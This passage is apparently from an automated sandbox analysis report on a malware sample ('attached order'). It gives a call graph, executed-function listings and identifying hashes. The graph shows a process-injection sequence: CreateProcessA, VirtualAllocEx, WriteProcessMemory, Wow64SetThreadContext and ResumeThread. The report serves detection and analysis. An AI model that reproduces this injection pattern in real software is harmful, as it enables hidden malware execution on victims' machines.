a322411 2 API calls 46763->46766 46767 a3222b7 4 API calls 46763->46767 46768 a32201b 4 API calls 46763->46768 46769 a322139 2 API calls 46763->46769 46770 a32227e 4 API calls 46763->46770 46771 a32247e 6 API calls 46763->46771 46772 a32299e 2 API calls 46763->46772 46773 a32217f 2 API calls 46763->46773 46774 a32225d 2 API calls 46763->46774 46775 a3221dd 2 API calls 46763->46775 46776 a3228a1 2 API calls 46763->46776 46777 a3223e6 2 API calls 46763->46777 46778 a3221a7 2 API calls 46763->46778 46779 a321f24 4 API calls 46763->46779 46780 a322385 2 API calls 46763->46780 46781 a322749 2 API calls 46763->46781 46782 a322a69 2 API calls 46763->46782 46783 a32256d 2 API calls 46763->46783 46764->46712 46765->46764 46766->46764 46767->46764 46768->46764 46769->46764 46770->46764 46771->46764 46772->46764 46773->46764 46774->46764 46775->46764 46776->46764 46777->46764 46778->46764 46779->46764 46780->46764 46781->46764 46782->46764 46783->46764 46785 a321fbf 46784->46785 46902 a320d38 46785->46902 46906 a320d2f 46785->46906 46786 a322859 46786->46719 46787 a32211a 46787->46786 46791 a320910 Wow64SetThreadContext 46787->46791 46792 a320918 Wow64SetThreadContext 46787->46792 46788 a322a88 46791->46788 46792->46788 46794 a322145 46793->46794 46910 a320910 46794->46910 46914 a320918 46794->46914 46795 a322a88 46799 a322a6d 46798->46799 46801 a320910 Wow64SetThreadContext 46799->46801 46802 a320918 Wow64SetThreadContext 46799->46802 46800 a322a88 46801->46800 46802->46800 46804 a32274f 46803->46804 46805 a322672 46804->46805 46918 a320ba0 46804->46918 46922 a320b98 46804->46922 46926 a320ab0 46808->46926 46930 a320aab 46808->46930 46809 a3223b3 46814 a321f53 46812->46814 46813 a321ff5 46813->46719 46814->46813 46818 a320d38 CreateProcessA 46814->46818 46819 a320d2f CreateProcessA 46814->46819 46815 a322859 46815->46719 46816 a32211a 46816->46815 46820 a320910 Wow64SetThreadContext 46816->46820 46821 a320918 Wow64SetThreadContext 46816->46821 46817 a322a88 46818->46816 46819->46816 46820->46817 46821->46817 46823 a322750 46822->46823 46825 a320ba0 ReadProcessMemory 46823->46825 46826 a320b98 ReadProcessMemory 46823->46826 46824 a322672 46825->46824 46826->46824 46828 a322145 46827->46828 46830 a320910 Wow64SetThreadContext 46828->46830 46831 a320918 Wow64SetThreadContext 46828->46831 46829 a322a88 46830->46829 46831->46829 46833 a322145 46832->46833 46835 a320910 Wow64SetThreadContext 46833->46835 46836 a320918 Wow64SetThreadContext 46833->46836 46834 a322a88 46835->46834 46836->46834 46839 a320ab0 WriteProcessMemory 46837->46839 46840 a320aab WriteProcessMemory 46837->46840 46838 a32220b 46838->46719 46839->46838 46840->46838 46842 a3221a0 46841->46842 46843 a322a2d 46842->46843 46934 a320860 46842->46934 46938 a320868 46842->46938 46843->46719 46847 a3221a0 46846->46847 46848 a322a2d 46847->46848 46849 a320860 ResumeThread 46847->46849 46850 a320868 ResumeThread 46847->46850 46848->46719 46849->46847 46850->46847 46852 a322145 46851->46852 46854 a320910 Wow64SetThreadContext 46852->46854 46855 a320918 Wow64SetThreadContext 46852->46855 46853 a322a88 46854->46853 46855->46853 46942 a3209e8 46856->46942 46946 a3209f0 46856->46946 46857 a322ab4 46858 a3222ce 46858->46857 46865 a320ab0 WriteProcessMemory 46858->46865 46866 a320aab WriteProcessMemory 46858->46866 46859 a322145 46863 a320910 Wow64SetThreadContext 46859->46863 46864 a320918 Wow64SetThreadContext 46859->46864 46860 a322a88 46863->46860 46864->46860 46865->46859 46866->46859 46872 a320910 Wow64SetThreadContext 46867->46872 46873 a320918 Wow64SetThreadContext 46867->46873 46868 a322a2d 46868->46719 46869 a3221a0 46869->46868 46870 a320860 ResumeThread 46869->46870 46871 a320868 ResumeThread 46869->46871 46870->46869 46871->46869 46872->46869 46873->46869 46875 a322145 46874->46875 46877 a320910 Wow64SetThreadContext 46875->46877 46878 a320918 Wow64SetThreadContext 46875->46878 46876 a322a88 46877->46876 46878->46876 46881 a321fbf 46879->46881 46880 a321ff5 46880->46719 46881->46880 46885 a320d38 CreateProcessA 46881->46885 46886 a320d2f CreateProcessA 46881->46886 46882 a322859 46882->46719 46883 a32211a 46883->46882 46887 a320910 Wow64SetThreadContext 46883->46887 46888 a320918 Wow64SetThreadContext 46883->46888 46884 a322a88 46885->46883 46886->46883 46887->46884 46888->46884 46890 a3222bd 46889->46890 46895 a320ab0 WriteProcessMemory 46890->46895 46896 a320aab WriteProcessMemory 46890->46896 46891 a322145 46893 a320910 Wow64SetThreadContext 46891->46893 46894 a320918 Wow64SetThreadContext 46891->46894 46892 a322a88 46893->46892 46894->46892 46895->46891 46896->46891 46898 a322384 46897->46898 46899 a3223b3 46898->46899 46900 a320ab0 WriteProcessMemory 46898->46900 46901 a320aab WriteProcessMemory 46898->46901 46900->46899 46901->46899 46903 a320dc1 46902->46903 46903->46903 46904 a320f26 CreateProcessA 46903->46904 46905 a320f83 46904->46905 46905->46905 46907 a320d38 CreateProcessA 46906->46907 46909 a320f83 46907->46909 46909->46909 46911 a320918 Wow64SetThreadContext 46910->46911 46913 a3209a5 46911->46913 46913->46795 46915 a32095d Wow64SetThreadContext 46914->46915 46917 a3209a5 46915->46917 46917->46795 46919 a320beb ReadProcessMemory 46918->46919 46921 a320c2f 46919->46921 46921->46805 46923 a320b9b ReadProcessMemory 46922->46923 46925 a320c2f 46923->46925 46925->46805 46927 a320af8 WriteProcessMemory 46926->46927 46929 a320b4f 46927->46929 46929->46809 46931 a320af8 WriteProcessMemory 46930->46931 46933 a320b4f 46931->46933 46933->46809 46935 a320868 ResumeThread 46934->46935 46937 a3208d9 46935->46937 46937->46842 46939 a3208a8 ResumeThread 46938->46939 46941 a3208d9 46939->46941 46941->46842 46943 a3209f0 VirtualAllocEx 46942->46943 46945 a320a6d 46943->46945 46945->46858 46947 a320a30 VirtualAllocEx 46946->46947 46949 a320a6d 46947->46949 46949->46858 46972 a322f08 46973 a323093 46972->46973 46974 a322f2e 46972->46974 46974->46973 46977 a323188 PostMessageW 46974->46977 46979 a323180 PostMessageW 46974->46979 46978 a3231f4 46977->46978 46978->46974 46980 a3231f4 46979->46980 46980->46974 46626 1ab9c20 46628 1ab9c37 46626->46628 46627 1ab9c6e 46628->46627 46631 1ab9d19 46628->46631 46635 1ab97b8 46628->46635 46632 1ab9d3a 46631->46632 46633 1ab9d45 46632->46633 46639 1ab9e11 46632->46639 46633->46628 46636 1ab97c3 46635->46636 46656 1abb1ec 46636->46656 46638 1abcad6 46638->46628 46640 1ab9e35 46639->46640 46644 1aba328 46640->46644 46648 1aba318 46640->46648 46646 1aba34f 46644->46646 46645 1aba42c 46645->46645 46646->46645 46652 1ab9f74 46646->46652 46650 1aba328 46648->46650 46649 1aba42c 46649->46649 46650->46649 46651 1ab9f74 CreateActCtxA 46650->46651 46651->46649 46653 1abb3b8 CreateActCtxA 46652->46653 46655 1abb47b 46653->46655 46655->46655 46657 1abb1f7 46656->46657 46660 1abc680 46657->46660 46659 1abcc75 46659->46638 46661 1abc68b 46660->46661 46664 1abc6b0 46661->46664 46663 1abcd5a 46663->46659 46665 1abc6bb 46664->46665 46668 1abc6e0 46665->46668 46667 1abce4d 46667->46663 46669 1abc6eb 46668->46669 46672 1abdb1c 46669->46672 46671 1abdec8 46671->46667 46673 1abdb27 46672->46673 46674 1abf369 46673->46674 46676 1abdd64 46673->46676 46674->46671 46677 1abf4c8 FindWindowW 46676->46677 46679 1abf54d 46677->46679 46679->46674 46981 5a32cd8 46982 5a32d1e GetCurrentProcess 46981->46982 46984 5a32d70 GetCurrentThread 46982->46984 46985 5a32d69 46982->46985 46986 5a32da6 46984->46986 46987 5a32dad GetCurrentProcess 46984->46987 46985->46984 46986->46987 46988 5a32de3 46987->46988 46989 5a32e0b GetCurrentThreadId 46988->46989 46990 5a32e3c 46989->46990 46680 9e515a8 46681 9e515c2 46680->46681 46685 9e515f0 46681->46685 46696 9e515e2 46681->46696 46682 9e515d5 46687 9e51605 46685->46687 46686 9e5168b 46694 9e515f0 GetCurrentThreadId 46686->46694 46695 9e515e2 GetCurrentThreadId 46686->46695 46687->46686 46689 9e516c0 46687->46689 46688 9e51695 46688->46682 46693 9e517c3 46689->46693 46707 9e50734 46689->46707 46692 9e50734 GetCurrentThreadId 46692->46693 46693->46682 46694->46688 46695->46688 46698 9e515eb 46696->46698 46697 9e5168b 46705 9e515f0 GetCurrentThreadId 46697->46705 46706 9e515e2 GetCurrentThreadId 46697->46706 46698->46697 46700 9e516c0 46698->46700 46699 9e51695 46699->46682 46701 9e50734 GetCurrentThreadId 46700->46701 46704 9e517c3 46700->46704 46702 9e517e8 46701->46702 46703 9e50734 GetCurrentThreadId 46702->46703 46703->46704 46704->46682 46705->46699 46706->46699 46708 9e5073f 46707->46708 46709 9e51b0f GetCurrentThreadId 46708->46709 46710 9e517e8 46708->46710 46709->46710 46710->46692 46991 9e571d8 46992 9e57226 DrawTextExW 46991->46992 46994 9e5727e 46992->46994 46995 1a2d01c 46997 1a2d034 46995->46997 46996 1a2d08e 46997->46996 47003 5a37699 46997->47003 47008 5a3626c 46997->47008 47017 5a37648 46997->47017 47021 5a37638 46997->47021 47025 5a383a8 46997->47025 47005 5a3768a 47003->47005 47004 5a376a2 47005->47004 47006 5a3626c CallWindowProcW 47005->47006 47007 5a3768f 47006->47007 47007->46996 47009 5a36277 47008->47009 47010 5a38419 47009->47010 47012 5a38409 47009->47012 47013 5a38417 47010->47013 47050 5a36394 47010->47050 47034 5a38530 47012->47034 47039 5a3860c 47012->47039 47045 5a38540 47012->47045 47018 5a3766e 47017->47018 47019 5a3626c CallWindowProcW 47018->47019 47020 5a3768f 47019->47020 47020->46996 47022 5a37648 47021->47022 47023 5a3626c CallWindowProcW 47022->47023 47024 5a3768f 47023->47024 47024->46996 47026 5a383b8 47025->47026 47027 5a38419 47026->47027 47029 5a38409 47026->47029 47028 5a36394 CallWindowProcW 47027->47028 47030 5a38417 47027->47030 47028->47030 47031 5a38530 CallWindowProcW 47029->47031 47032 5a38540 CallWindowProcW 47029->47032 47033 5a3860c CallWindowProcW 47029->47033 47031->47030 47032->47030 47033->47030 47036 5a38540 47034->47036 47035 5a385e0 47035->47013 47054 5a385e8 47036->47054 47058 5a385f8 47036->47058 47040 5a385ca 47039->47040 47041 5a3861a 47039->47041 47043 5a385e8 CallWindowProcW 47040->47043 47044 5a385f8 CallWindowProcW 47040->47044 47042 5a385e0 47042->47013 47043->47042 47044->47042 47047 5a38554 47045->47047 47046 5a385e0 47046->47013 47048 5a385e8 CallWindowProcW 47047->47048 47049 5a385f8 CallWindowProcW 47047->47049 47048->47046 47049->47046 47051 5a3639f 47050->47051 47052 5a39afa CallWindowProcW 47051->47052 47053 5a39aa9 47051->47053 47052->47053 47053->47013 47055 5a385f8 47054->47055 47056 5a38609 47055->47056 47061 5a39a3e 47055->47061 47056->47035 47059 5a38609 47058->47059 47060 5a39a3e CallWindowProcW 47058->47060 47059->47035 47060->47059 47062 5a36394 CallWindowProcW 47061->47062 47063 5a39a4a 47062->47063 47063->47056

                                                                                          Executed Functions

                                                                                          Function 0BA73338 Relevance: 2.3, Strings: 1, Instructions: 1022COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 175 ba73338-ba73359 176 ba73360-ba7344c 175->176 177 ba7335b 175->177 179 ba73c74-ba73c9c 176->179 180 ba73452-ba735a3 176->180 177->176 183 ba74379-ba74382 179->183 224 ba73c42-ba73c72 180->224 225 ba735a9-ba73604 180->225 184 ba73caa-ba73cb3 183->184 185 ba74388-ba7439f 183->185 187 ba73cb5 184->187 188 ba73cba-ba73dae 184->188 187->188 206 ba73db0-ba73dbc 188->206 207 ba73dd8 188->207 209 ba73dc6-ba73dcc 206->209 210 ba73dbe-ba73dc4 206->210 211 ba73dde-ba73dfe 207->211 213 ba73dd6 209->213 210->213 216 ba73e00-ba73e59 211->216 217 ba73e5e-ba73ed4 211->217 213->211 228 ba74376 216->228 236 ba73ed6-ba73f27 217->236 237 ba73f29-ba73f6c call ba732e8 217->237 224->179 231 ba73606 225->231 232 ba73609-ba73614 225->232 228->183 231->232 235 ba73b58-ba73b5e 232->235 238 ba73b64-ba73be1 235->238 239 ba73619-ba73637 235->239 267 ba73f77-ba73f7d 236->267 237->267 284 ba73c2e-ba73c34 238->284 242 ba7368e-ba736a3 239->242 243 ba73639-ba7363d 239->243 247 ba736a5 242->247 248 ba736aa-ba736c0 242->248 243->242 250 ba7363f-ba7364a 243->250 247->248 252 ba736c7-ba736de 248->252 253 ba736c2 248->253 255 ba73680-ba73686 250->255 257 ba736e5-ba736fb 252->257 258 ba736e0 252->258 253->252 259 ba7364c-ba73650 255->259 260 ba73688-ba73689 255->260 265 ba73702-ba73709 257->265 266 ba736fd 257->266 258->257 263 ba73656-ba7366e 259->263 264 ba73652 259->264 261 ba7370c-ba7377d 260->261 272 ba73793-ba7390b 261->272 273 ba7377f 261->273 269 ba73675-ba7367d 263->269 270 ba73670 263->270 264->263 265->261 266->265 271 ba73fd4-ba73fe0 267->271 269->255 270->269 274 ba73fe2-ba7406a 271->274 275 ba73f7f-ba73fa1 271->275 281 ba73921-ba73a5c 272->281 282 ba7390d 272->282 273->272 276 ba73781-ba7378d 273->276 306 ba741eb-ba741f4 274->306 279 ba73fa3 275->279 280 ba73fa8-ba73fd1 275->280 276->272 279->280 280->271 296 ba73ac0-ba73ad5 281->296 297 ba73a5e-ba73a62 281->297 282->281 286 ba7390f-ba7391b 282->286 287 ba73c36 284->287 288 ba73be3-ba73c2b 284->288 286->281 287->224 288->284 298 ba73ad7 296->298 299 ba73adc-ba73afd 296->299 297->296 300 ba73a64-ba73a73 297->300 298->299 303 ba73b04-ba73b23 299->303 304 ba73aff 299->304 305 ba73ab2-ba73ab8 300->305 311 ba73b25 303->311 312 ba73b2a-ba73b4a 303->312 304->303 307 ba73a75-ba73a79 305->307 308 ba73aba-ba73abb 305->308 309 ba7406f-ba74084 306->309 310 ba741fa-ba74255 306->310 314 ba73a83-ba73aa4 307->314 315 ba73a7b-ba73a7f 307->315 313 ba73b55 308->313 316 ba74086 309->316 317 ba7408d-ba741d9 309->317 334 ba74257-ba7428a 310->334 335 ba7428c-ba742b6 310->335 311->312 318 ba73b51 312->318 319 ba73b4c 312->319 313->235 322 ba73aa6 314->322 323 ba73aab-ba73aaf 314->323 315->314 316->317 324 ba740d6-ba74116 316->324 325 ba74093-ba740d1 316->325 326 ba74160-ba741a0 316->326 327 ba7411b-ba7415b 316->327 338 ba741e5 317->338 318->313 319->318 322->323 323->305 324->338 325->338 326->338 327->338 343 ba742bf-ba74350 334->343 335->343 338->306 347 ba74357-ba7436f 343->347 347->228
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <ov!
                                                                                          • API String ID: 0-3980319286
                                                                                          • Opcode ID: fe1c59251393ad850081593c8ccb24c18a16bdb11d6929566558b834ad9f61b6
                                                                                          • Instruction ID: 2fc685861334b2dd5188b3d799ca5308f5c87397e70423e448710e4a881e24ca
                                                                                          • Opcode Fuzzy Hash: fe1c59251393ad850081593c8ccb24c18a16bdb11d6929566558b834ad9f61b6
                                                                                          • Instruction Fuzzy Hash: 75B2DC75E00228DFDB64DF69C984AD9BBB2FF89304F1581E9D409AB265DB319E81CF40
                                                                                          Function 01AB3400 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "{r
                                                                                          • API String ID: 0-3231798924
                                                                                          • Opcode ID: 691997cab8e9cef18f419a3db344c51ad1946197112f5c0bdc8c23da44c9f2b6
                                                                                          • Instruction ID: 6c4e42985210fc0863b370ade06c6d346269a86c346690347c5013b8f6036751
                                                                                          • Opcode Fuzzy Hash: 691997cab8e9cef18f419a3db344c51ad1946197112f5c0bdc8c23da44c9f2b6
                                                                                          • Instruction Fuzzy Hash: FCF16174D0534ADFCB18CFA9D4854AEFBB2FF89300B54816AC416AB21AD734E942CF95
                                                                                          Function 01AB34E0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "{r
                                                                                          • API String ID: 0-3231798924
                                                                                          • Opcode ID: f404c990e57b024f634253fbfcaa6ee03877ba54fe4defbaf6899016b0f2192f
                                                                                          • Instruction ID: 042bc1709ebc6d7caf1ee0a910e9f6498556d9ebbef646524a281c2a1f54c3a9
                                                                                          • Opcode Fuzzy Hash: f404c990e57b024f634253fbfcaa6ee03877ba54fe4defbaf6899016b0f2192f
                                                                                          • Instruction Fuzzy Hash: 04D14974E0424AEFCB18CFA9D4818EEFBB6FF89300B589559D416A7215C734EA42CF94
                                                                                          Function 09E55E94 Relevance: .6, Instructions: 620COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: da5b883c816b7fad69e273d40218b8d2e5f05a52e0cf2b64bcc4ee081357b07f
                                                                                          • Instruction ID: 81349b23795e3560fc643dae482ff8d0c66c428fcd09ee15c1633c320faffb47
                                                                                          • Opcode Fuzzy Hash: da5b883c816b7fad69e273d40218b8d2e5f05a52e0cf2b64bcc4ee081357b07f
                                                                                          • Instruction Fuzzy Hash: 7A324D30A012189FDB55DFA9C8507AEBBF2BF88300F14D56AD84AAB385DF349D45CB91
                                                                                          Function 0A323F40 Relevance: .4, Instructions: 400COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7788361d232ef715b1c7ca2a1dddf58efef188bd3efc1b41e73cd6d493bffa6a
                                                                                          • Instruction ID: 7ca27850cb4f5ec014c0dae31d87c5a788e6363b1162c10d217e335186e707d0
                                                                                          • Opcode Fuzzy Hash: 7788361d232ef715b1c7ca2a1dddf58efef188bd3efc1b41e73cd6d493bffa6a
                                                                                          • Instruction Fuzzy Hash: BAE1CE317017248FEB25DB79C560BAEB7FAAF89700F14846DE14A9B291DB39EC01CB51
                                                                                          Function 09E55E86 Relevance: .3, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fad323c6d9073840fabda55a4f8eb6d68f1a39a22df18981a519b8252c77ac4e
                                                                                          • Instruction ID: dbd856afb134e7264e72b946c95e239ea371bde8d57728ef193e3be360f2430a
                                                                                          • Opcode Fuzzy Hash: fad323c6d9073840fabda55a4f8eb6d68f1a39a22df18981a519b8252c77ac4e
                                                                                          • Instruction Fuzzy Hash: 45C14A31E002198FDF15CFA5C88079DBBB2BF89314F14D5AAE80AAB255DB31AD95CF50
                                                                                          Function 09E57B08 Relevance: .3, Instructions: 279COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 813c9332078dfc5fd4c808aafe5a882aae7917a1264658f3acf686fea378cded
                                                                                          • Instruction ID: 2e153014367d681b2b8e3c11413f7e42391b718d06841e80799ea2d4377bef8a
                                                                                          • Opcode Fuzzy Hash: 813c9332078dfc5fd4c808aafe5a882aae7917a1264658f3acf686fea378cded
                                                                                          • Instruction Fuzzy Hash: 40C13935E002198FDF15CFA5C88079DBBB2AF88314F14D1AAE80AAB255DB31AD95CF50
                                                                                          Function 01AB1358 Relevance: .3, Instructions: 256COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6fd6dcc0102ed6738b9ee49f5a9d8a0841d12bbbb263d0fd0726cf914c9502fe
                                                                                          • Instruction ID: 12a0d28a05d5f43aa6f0267c00db0f3b5e72941e1692a35853d44e483667a8d4
                                                                                          • Opcode Fuzzy Hash: 6fd6dcc0102ed6738b9ee49f5a9d8a0841d12bbbb263d0fd0726cf914c9502fe
                                                                                          • Instruction Fuzzy Hash: D8B14670E01249DFDB48CFA9C894ADEFBB2FF89310F14842AD415AB25AD7359942CF54
                                                                                          Function 0A321F24 Relevance: .2, Instructions: 209COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f57d2185fac89a21a60cf9d3fbeea701680e132232f34495075729ed5b64322
                                                                                          • Instruction ID: e7a3ac75c789eaa905da19ab23029c95f78fdea9e74b9b80fc6b132c344a62f5
                                                                                          • Opcode Fuzzy Hash: 3f57d2185fac89a21a60cf9d3fbeea701680e132232f34495075729ed5b64322
                                                                                          • Instruction Fuzzy Hash: E891F375D05229DFEB68CF66CC40BEAB7B6AF89300F14D1EAC509A6250EB705AC5CF40
                                                                                          Function 01AB1408 Relevance: .2, Instructions: 207COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20b8dc437e3507f0c4fa2db361fc5c1694d27fb0267c8602f1f0f5d188c2bc9f
                                                                                          • Instruction ID: 5e2bf3b278c6c3d8e25add1367f0254e03c8fd19d8acb4e559adf283c1f29f01
                                                                                          • Opcode Fuzzy Hash: 20b8dc437e3507f0c4fa2db361fc5c1694d27fb0267c8602f1f0f5d188c2bc9f
                                                                                          • Instruction Fuzzy Hash: 4591D174E002498FCB04CFAAD994AEEFBB6FB88300F24852AD415AB359D7349946CF54
                                                                                          Function 01AB1C98 Relevance: .1, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 91d0e4e8e955dc242858046e2ddca8fcccc9ff424202c74f09d0484934462a8f
                                                                                          • Instruction ID: 37402a4ccdbbb8ca1d77ef86e165aded8cd1f123243cc484f4584e88ae95dadb
                                                                                          • Opcode Fuzzy Hash: 91d0e4e8e955dc242858046e2ddca8fcccc9ff424202c74f09d0484934462a8f
                                                                                          • Instruction Fuzzy Hash: 67512674E052498FDB08CFAAD5956AEFBF2FF89200F28C46AD419A7255D3348A41CF94
                                                                                          Function 0BA7AF20 Relevance: .1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97db2b1d855f278ba65a264acaf75c55fb702d2843b19d2d561b80ef78e049b2
                                                                                          • Instruction ID: bfecbe9825f0984a2d2a9207fdc54f68dcc0d134e8f67a4b128e0183f9abdaa5
                                                                                          • Opcode Fuzzy Hash: 97db2b1d855f278ba65a264acaf75c55fb702d2843b19d2d561b80ef78e049b2
                                                                                          • Instruction Fuzzy Hash: F92107B1D09619DBEB08DFA7C8543EEBBF6AFC9300F14D06AC41966254DB74094ACFA1
                                                                                          Function 01AB2698 Relevance: .1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f8f84b2eebeb880a5b7af614e3cd09176921672f017c1ec3e1b6223b94e97097
                                                                                          • Instruction ID: f80750e7d316b13d80dffc3c5e4fa23909467acdee4d17d30493401ed87c14fa
                                                                                          • Opcode Fuzzy Hash: f8f84b2eebeb880a5b7af614e3cd09176921672f017c1ec3e1b6223b94e97097
                                                                                          • Instruction Fuzzy Hash: 4F213975E006588BEB18CFABD9902DEBFF7AFC9310F14C06AD808A6259DB341956CF50
                                                                                          Function 05A32CC8 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32D56
                                                                                          • GetCurrentThread.KERNEL32 ref: 05A32D93
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32DD0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05A32E29
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: c44c24479ae832a7e27aca4c768f2f7fe6ee4830996ebaa46ec10353e414a385
                                                                                          • Instruction ID: dbf02d32959493fa821dad25a9d67f48847427fa4baec936347dfb61f09694f4
                                                                                          • Opcode Fuzzy Hash: c44c24479ae832a7e27aca4c768f2f7fe6ee4830996ebaa46ec10353e414a385
                                                                                          • Instruction Fuzzy Hash: 795164B09053498FDB44CFAAD989BEEBBF1BF48304F248459E019B7390D7749884CB65
                                                                                          Function 05A32CD8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32D56
                                                                                          • GetCurrentThread.KERNEL32 ref: 05A32D93
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32DD0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05A32E29
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
